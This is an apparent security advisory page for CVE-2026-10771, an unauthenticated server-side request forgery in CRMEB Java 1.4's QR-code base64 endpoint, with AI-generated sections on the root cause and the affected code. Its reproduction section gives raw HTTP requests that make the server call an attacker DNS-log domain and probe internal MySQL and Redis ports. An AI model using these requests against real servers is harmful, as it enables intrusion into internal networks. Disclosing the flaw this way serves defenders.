VYPR
← All advisories
High severity7.3NVD Advisory· Published Jun 3, 2026

CVE-2026-10771

CVE-2026-10771

Description

CRMEB Java 1.4 is vulnerable to SSRF via the base64 Qrcode Endpoint, allowing remote attackers to make arbitrary HTTP requests from the server.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CRMEB Java 1.4 is vulnerable to SSRF via the base64 Qrcode Endpoint, allowing remote attackers to make arbitrary HTTP requests from the server.

Vulnerability

A Server-Side Request Forgery (SSRF) vulnerability exists in CRMEB Java version 1.4 within the RestTemplateUtil.java file's getForEntity function. The url parameter in the POST /api/front/qrcode/base64 endpoint is used without validation, allowing for arbitrary HTTP requests to be made from the server.

Exploitation

An attacker can exploit this vulnerability remotely without authentication. By sending a POST request to the /api/front/qrcode/base64 endpoint with a crafted url parameter, an attacker can trick the server into making an HTTP request to an attacker-controlled domain or an internal network resource. The endpoint is not protected by the authentication interceptor [2].

Impact

Successful exploitation of this SSRF vulnerability allows an attacker to perform arbitrary HTTP requests from the server. This can lead to information disclosure by probing internal services, accessing sensitive internal resources, or potentially interacting with internal APIs, depending on the server's network configuration and accessible services [2].

Mitigation

CRMEB Java version 1.4 is affected. The project was informed of the issue via an issue report [2], but as of the publication date, no patch or fix has been released, and the project has not responded. There are no known workarounds. The project is still under active development as indicated by its GitHub repository [1].

References
  1. GitHub - crmeb/crmeb_java: Java商城 免费 开源 CRMEB商城JAVA版,SpringBoot + Maven + Swagger + Mybatis Plus + Redis + Uniapp +Vue+elementUI 包含移动端、小程序、PC后台、Api接口;有产品、用户、购物车、订单、积分、优惠券、营销、余额、权限、角色、系统设置、组合数据、可拖拉拽的form表单等模块,大量的减少了二开的成本。
  2. SSRF in CRMEB-Java — `/api/front/qrcode/base64`

AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Crmeb/Crmeb Javareferences2 versions
    (expand)+ 1 more
    • (no CPE)
    • (no CPE)range: <1.4

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The url parameter is directly passed to RestTemplate.getForEntity() without any validation, allowing attackers to make arbitrary HTTP requests from the server."

Attack vector

An attacker can send a POST request to the `/api/front/qrcode/base64` endpoint with a crafted URL. This endpoint is not protected by authentication, allowing unauthenticated access. The server then uses the provided URL in a call to `RestTemplate.getForEntity()`, enabling the attacker to perform server-side requests to arbitrary hosts or internal network resources [ref_id=1].

Affected code

The vulnerability resides in the `getBuffer` function within `crmeb-common/src/main/java/com/zbkj/common/utils/RestTemplateUtil.java`. This function directly uses the `url` parameter in `restTemplate.getForEntity(url, byte[].class).getBody()` without performing any validation. The entry point is the `get` function in `crmeb-front/src/main/java/com/zbkj/front/controller/QrCodeController.java`, which calls the vulnerable `base64` service method.

What the fix does

The advisory does not specify a patch or provide details on remediation. It indicates that the project was informed but has not responded. Therefore, no fix is currently available.

Preconditions

  • authNo authentication is required to access the vulnerable endpoint.
  • networkThe attacker must have network access to the target server.

Reproduction

1. Verify SSRF via DNS callback POST /api/front/qrcode/base64 HTTP/1.1 Host: <target> Content-Type: application/x-www-form-urlencoded

url=http://<your-dnslog-domain> Check DNS log for callback from the server, confirming SSRF. 2. Internal network probing POST /api/front/qrcode/base64 HTTP/1.1 Host: <target> Content-Type: application/x-www-form-urlencoded

url=http://mysql:3306 Response: {"code":500,"message":"I/O error on GET request for \"http://mysql:3306\": Invalid Http response"} POST /api/front/qrcode/base64 HTTP/1.1 Host: <target> Content-Type: application/x-www-form-urlencoded

url=http://redis:6379 Response: {"code":500,"message":"I/O error on GET request for \"http://redis:6379\": Invalid Http response"} Error messages confirm the server successfully connected to internal MySQL and Redis services. [ref_id=1]

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.